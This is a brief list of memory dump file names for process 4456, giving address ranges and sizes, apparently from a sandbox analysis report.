  • memory/4456-18-0x00007FF996B90000-0x00007FF997652000-memory.dmp

    Filesize

    10.8MB

  • memory/4456-16-0x00007FF996B90000-0x00007FF997652000-memory.dmp

    Filesize

    10.8MB

  • memory/4456-15-0x00007FF996B90000-0x00007FF997652000-memory.dmp

    Filesize

    10.8MB

  • memory/4456-14-0x00007FF996B90000-0x00007FF997652000-memory.dmp

    Filesize

    10.8MB

  • memory/4456-13-0x000001F8FB540000-0x000001F8FB562000-memory.dmp

    Filesize

    136KB

  • memory/4456-4-0x00007FF996B93000-0x00007FF996B95000-memory.dmp

    Filesize

    8KB